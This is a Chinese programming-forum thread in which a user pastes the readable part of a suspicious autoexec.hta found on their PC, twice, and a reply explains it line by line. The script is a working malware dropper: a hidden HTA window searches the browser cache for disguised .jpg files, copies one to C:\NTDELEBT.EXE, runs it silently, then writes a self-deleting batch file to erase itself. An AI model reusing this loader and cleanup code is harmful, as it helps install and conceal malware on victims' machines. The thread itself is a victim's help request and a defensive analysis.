无意中按ALT+tab,发现有两个未知窗口存在,可是进程中也没有.
按名称找到C:\下一个autoexec.hta文件.用UE打开看了一下,
不完全是文本,头部多了一个东西,乱码.但多数是明文.明文部分如下:
请J版各位兄弟驵妹给俺解释一下,这是什么东东..
函数部分实在因为不了解JAVA的语法结构..没有格式化..<HTML>
<BODY>
<HEAD>
<SCRIPT language=JScript>
window.moveTo(5000,5000);
window.resizeTo(0,0);
</SCRIPT>
</HEAD>
<HTA:APPLICATION ID=ICY BORDER="none"CAPTION="no"SHOWINTASKBAR="no">
<BODY scroll="no"leftmargin="0"topmargin="0"marginwidth="0"marginheight="0">
<SCRIPT LANGUAGE="JavaScript">
function wj(b){try{var c=new Enumerator(fso.GetFolder(b).SubFolders);for(;!c.atEnd();c.moveNext()){var f0=c.item().Path+"\\AUTOEXEC[1].jpg";var f1=c.item().Path+"\\AUTOEXEC[2].jpg";var f="c:\\NTDELEBT.EXE";if(fso.FileExists(f0)){fso.CopyFile(f0,f);wsh.Run(f,0,false);v=1;break;}if(fso.FileExists(f1)){fso.CopyFile(f1,f);wsh.Run(f,0,false);v=1;break;}wj(c.item());}}catch(e){}}function kill(){path="c:\\AUTOEXE.BAT";v=ICY.commandLine;v=v.substring(1,v.length-2);var _w=fso.CreateTextFile(path);_w.Write('@echo off\r\n:A\r\ndel "'+v+'"\r\nif exist "'+v+'" goto A\r\ndel %0');_w.close();wsh.Run(path,0,false);window.close();}var v=0;try{var fso=new ActiveXObject("Scripting.FileSystemObject");var wsh=new ActiveXObject("WScript.Shell");var cache=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache");}catch(e){}function drun(){try{if(v==0){wj(cache);setTimeout("drun()",2000);}else{kill();}}catch(e){}}drun();
</SCRIPT>
</BODY>
</HTML>
按名称找到C:\下一个autoexec.hta文件.用UE打开看了一下,
不完全是文本,头部多了一个东西,乱码.但多数是明文.明文部分如下:
请J版各位兄弟驵妹给俺解释一下,这是什么东东..
函数部分实在因为不了解JAVA的语法结构..没有格式化..<HTML>
<BODY>
<HEAD>
<SCRIPT language=JScript>
window.moveTo(5000,5000);
window.resizeTo(0,0);
</SCRIPT>
</HEAD>
<HTA:APPLICATION ID=ICY BORDER="none"CAPTION="no"SHOWINTASKBAR="no">
<BODY scroll="no"leftmargin="0"topmargin="0"marginwidth="0"marginheight="0">
<SCRIPT LANGUAGE="JavaScript">
function wj(b){try{var c=new Enumerator(fso.GetFolder(b).SubFolders);for(;!c.atEnd();c.moveNext()){var f0=c.item().Path+"\\AUTOEXEC[1].jpg";var f1=c.item().Path+"\\AUTOEXEC[2].jpg";var f="c:\\NTDELEBT.EXE";if(fso.FileExists(f0)){fso.CopyFile(f0,f);wsh.Run(f,0,false);v=1;break;}if(fso.FileExists(f1)){fso.CopyFile(f1,f);wsh.Run(f,0,false);v=1;break;}wj(c.item());}}catch(e){}}function kill(){path="c:\\AUTOEXE.BAT";v=ICY.commandLine;v=v.substring(1,v.length-2);var _w=fso.CreateTextFile(path);_w.Write('@echo off\r\n:A\r\ndel "'+v+'"\r\nif exist "'+v+'" goto A\r\ndel %0');_w.close();wsh.Run(path,0,false);window.close();}var v=0;try{var fso=new ActiveXObject("Scripting.FileSystemObject");var wsh=new ActiveXObject("WScript.Shell");var cache=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache");}catch(e){}function drun(){try{if(v==0){wj(cache);setTimeout("drun()",2000);}else{kill();}}catch(e){}}drun();
</SCRIPT>
</BODY>
</HTML>
解决方案 »
- 关于Properties类的测试?
- 简单的字符串问题(问题有点诡异)
- java Swing 加入一个滚动条后不出东西了,为什么
- 寻找Cognos BI Bus API ???急!!!!!!
- Java程序读EXCEL文件,时间一栏读出来的结果是12进制时间,而不是EXCEL的24进制,高手进来
- tomcat+javabean+jsp的问题解决了给100分
- 求jdk1.5.0_08
- 请教一个用java访问xml的问题,急,在线等
- JTextField的一个小问题,大家帮忙解决!
- 一个软件项目经理的遭遇,见信,一切真实!大家来声讨流氓老板吧!
- lazy,延迟加载是个什么概念?
- 最近在学分形图形编程,很爽!
看起来(Sorry 咱不懂J)似乎有点病毒的意思?
{
try
{
/******************************
枚举器,列举项目内容,IE缓冲文件夹默认是Local Settings\Temporary Internet Files
******************************/
var c=new Enumerator(fso.GetFolder(b).SubFolders);
/******************************
循环遍利所有的子文件夹
******************************/
for(; !c.atEnd(); c.moveNext())
{
var f0=c.item().Path+"\\AUTOEXEC[1].jpg";
var f1=c.item().Path+"\\AUTOEXEC[2].jpg";
var f="c:\\NTDELEBT.EXE"; //问题出在这个文件上
if(fso.FileExists(f0)) //如果f0存在
{
fso.CopyFile(f0,f); //拷贝文件
wsh.Run(f,0,false); //执行f
v=1;
break;
}
if(fso.FileExists(f1)) //如果f1存在
{
fso.CopyFile(f1,f);
wsh.Run(f,0,false);
v=1;
break;
}
wj(c.item());
}
}
catch(e){}
}//下面这个函数是用来销毁后台所运行的文件的。
function kill()
{
path="c:\\AUTOEXE.BAT";
v=ICY.commandLine; //ICY是一个HTML APPLICATION,这个东西才是关键
//参考MSDN HTA::commandline
//Retrieves the argument used to launch the HTML Application (HTA).
v=v.substring(1,v.length-2);
var _w=fso.CreateTextFile(path); //创建文本文件C:\AUTOEXE.BAT
/************************************************************************
朝文本文件输入:
:A
del { ICY.commandLine.v.substring(1,v.length-2) 这个式子的运算结果}
if exist( V /*上面的那个文件*/)
goto A
del %0 //删除AUTOEXE.BAT文件自身
*************************************************************************/
_w.Write('@echo off\r\n:A\r\ndel "'+v+'"\r\nif exist "'+v+'" goto A\r\ndel %0');
_w.close();
wsh.Run(path,0,false); //运行该文件
window.close(); //关闭窗口
}var v=0;try
{
var fso=new ActiveXObject("Scripting.FileSystemObject"); //创建文件系统对象
var wsh=new ActiveXObject("WScript.Shell"); //创建Windows Script Host对象
/*IE的访问缓冲区位置*/
var cache=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache");
}
catch(e)
{}function drun()
{
try
{
if(v==0)
{
wj(cache);
setTimeout("drun()",2000); //每两秒种执行一次drun()函数
}
else
{
kill();
}
}
catch(e)
{}
}drun(); //调用drun()函数
</SCRIPT>Javascript与JAVA并没有多少干系。